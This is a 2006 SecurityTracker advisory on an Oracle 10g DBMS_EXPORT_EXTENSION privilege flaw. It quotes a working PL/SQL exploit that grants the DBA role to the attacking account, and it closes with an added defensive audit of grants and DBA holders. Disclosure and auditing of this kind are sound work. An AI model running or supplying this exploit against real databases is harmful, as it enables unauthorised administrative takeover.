SecurityTracker.com
Category:  Application (Database)  >  Oracle Database
Vendors:  Oracle
Oracle Database DBMS_EXPORT_EXTENSION Package Lets Remote Users Execute Arbitrary Functions
SecurityTracker Alert ID:  1015999
SecurityTracker URL:  http://securitytracker.com/id?1015999
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Apr 26 2006
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 10.2.0.2.0
Description:  A vulnerability was reported in Oracle Database. A remote authenticated user can execute arbitrary functions on the database.

A remote authenticated user can invoke the DBMS_EXPORT_EXTENSION package to open a user-supplied object and have the object execute an arbitrary function.

The vendor was notified on February 19, 2006 by NGSSoftware, which separately discovered this vulnerability.

N1V1Hd $3c41r3 originally disclosed this vulnerability.

Impact:  A remote authenticated user can execute arbitrary functions on the target system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.oracle.com/
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
Reported By:  "putosoft softputo" <hasecorp@hotmail.com>
Message History:   None.


 Source Message Contents

Date:  Wed, 19 Apr 2006 08:33:56 +0000
From:  "putosoft softputo" <hasecorp@hotmail.com>
Subject:  Oracle 10g 10.2.0.2.0 DBA exploit

/*
 * Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
 * Patch your database now!
 * by N1V1Hd $3c41r3
 */

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
   RETURN NUMBER;
END;
 

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
    RETURN NUMBER
  IS
   pragma autonomous_transaction;
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN(1);
  END;

END;
 

DECLARE
  INDEX_NAME VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME VARCHAR2(200);
  TYPE_SCHEMA VARCHAR2(200);
  VERSION VARCHAR2(200);
  NEWBLOCK PLS_INTEGER;
  GMFLAGS NUMBER;
  v_Return VARCHAR2(200);
BEGIN
  INDEX_NAME := 'A1';  INDEX_SCHEMA := 'HACKER';
  TYPE_NAME := 'MYBADPACKAGE';  TYPE_SCHEMA := 'HACKER';
  VERSION := '10.2.0.2.0';  GMFLAGS := 1;

  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    INDEX_NAME => INDEX_NAME,
    INDEX_SCHEMA => INDEX_SCHEMA,
    TYPE_NAME => TYPE_NAME,
    TYPE_SCHEMA => TYPE_SCHEMA,
    VERSION => VERSION,
    NEWBLOCK => NEWBLOCK,
    GMFLAGS => GMFLAGS
  );
END;

 


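A defender's audit for the conditions this advisory describes, as an added example that is not part of the original advisory or the source message. It lists who can execute SYS.DBMS_EXPORT_EXTENSION, which schemas hold stored source defining an ODCIIndexGetMetadata function, and who currently holds the DBA role. It assumes a session that can read the DBA_* dictionary views; the list of excluded owners is an assumption to adjust for the installation.

```sql
-- Added audit example (not from the original advisory or message).
-- Assumes a session with SELECT access to the DBA_* dictionary views.

-- 1. Who may call the package named in the advisory?
--    A row with GRANTEE = 'PUBLIC' means every authenticated user can reach it.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner      = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION'
   AND privilege  = 'EXECUTE'
 ORDER BY grantee;

-- 2. Stored PL/SQL that defines the ODCIIndexGetMetadata callback,
--    the function the package is made to invoke in the posted message.
--    The excluded owners are an assumed list of Oracle-supplied schemas
--    that may legitimately implement this interface; review and adjust.
SELECT DISTINCT owner, name, type
  FROM dba_source
 WHERE UPPER(text) LIKE '%ODCIINDEXGETMETADATA%'
   AND owner NOT IN ('SYS', 'CTXSYS', 'MDSYS')
 ORDER BY owner, name;

-- 3. Accounts and roles holding DBA, to compare against the approved list.
--    An unexpected grantee here is the outcome the posted code aims for.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;
```

Query 2 is a plain text match on DBA_SOURCE, so it will not see source that was stored in wrapped form.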

Copyright 2006, SecurityGlobal.net LLC